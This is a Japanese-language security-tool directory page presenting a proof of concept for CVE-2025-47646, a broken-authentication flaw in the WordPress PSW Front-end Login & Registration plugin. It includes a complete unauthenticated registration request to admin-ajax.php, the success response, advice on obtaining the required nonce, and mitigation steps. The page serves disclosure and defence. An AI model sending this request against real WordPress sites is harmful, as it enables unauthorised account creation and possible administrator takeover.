Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-47646 — WordPress PSW Front-end Login &amp; Registration Plugin <= 1.12 は壊れた認証(Broken Authentication)に対して脆弱です | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-47646
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証学習と教育
GitHubnxploited/cve-2025-47646

CVE-2025-47646

WordPress PSW Front-end Login &amp; Registration Plugin <= 1.12 は壊れた認証(Broken Authentication)に対して脆弱です

リポジトリを見る
211年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔐 CVE-2025-47646 – PSW Front-end Login & Registration <= 1.12

📌 プラグイン情報

  • プラグイン: PSW Front-end Login & Registration
  • 影響を受けるバージョン: <= 1.12
  • CVE: CVE-2025-47646
  • 深刻度: 高 (CVSS 9.8)
  • 脆弱性の種類: Broken Authentication
  • 必要な権限: 未認証
  • 修正済み: ❌ 公式の修正は提供されていません
  • パッチ優先度: 🔴 高
  • 公開日: 2025年5月8日

⚠️ 脆弱性の概要

このプラグインは、その登録メカニズムに重大な欠陥を晒しています。
ショートコードベースのフロントエンド登録フォーム([psw_registration])を提供する一方で、適切なロール制限や安全な検証を強制できていません。

攻撃者はこのメカニズムを悪用して、認証なしでアカウントを作成できます。さらに、サイトの default_role が不適切に設定されている場合(例: administrator)、完全な権限昇格が発生する可能性があります。


🧪 概念実証(PoC)

✅ 対象エンドポイント:

root@kitploit:~
POST /wordpress/wp-admin/admin-ajax.php

📥 リクエスト(例: Burp Suite や curl を使用):

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1

Host: {Host}

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 233

Origin: {Host}

Connection: keep-alive

Cookie:

Priority: u=0



first_name=nxploited&last_name=nxploited&new_user_name=nxpl3432oited&new_user_email=NxploitBot%40gmail.com&new_user_password=admin&new_user_password_confirmation=admin&action=register_user_front_end&psw_form=75a32ef38d

psw_form はリクエストを通すために必要な nonce フィールドです。
この nonce は、フロントエンドの [psw_registration] ショートコードから動的に生成されます。


✅ 成功レスポンス

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<h4>Hello nxploited nxploited</h4>
<p>Thanks for creating an account on our website. Please check your email for activation link...</p>

🛠️ 欠陥はどこにあるのか?

  • このプラグインは register_user_front_end への 未認証 AJAX アクセス を許可しています
  • WordPress の default_role 設定を尊重し、ユーザーロールを割り当てます
  • これが不適切に設定されている場合(administrator)、攻撃者は完全なアクセス権を取得します
  • プラグインのロジックには ハードコードされたロールの強制や検証はありません

💬 ショートコードの説明

psw_form の有効な nonce を生成し、登録フォームを公開するには、次のショートコードを使用します:

root@kitploit:~
[psw_registration]

これにより、AJAX 呼び出しを成功させるために必要な隠し nonce フィールドを含む登録フォームが表示されます。


🔐 推奨事項

  • 未認証の AJAX 登録を制限する
  • ロール割り当てをサーバーサイドで強制する
  • default_role を監視し、安全な値(例: subscriber)に固定する
  • アップデートが利用できない場合は仮想パッチを適用する

⚠️ 免責事項

このレポートは 教育および正規に許可されたセキュリティテストの目的のみ を対象としています。
許可なくこの脆弱性を悪用することは、法的・倫理的境界に違反する可能性があります。


NXploited (Khaled_Alenazi)

ツールをダウンロード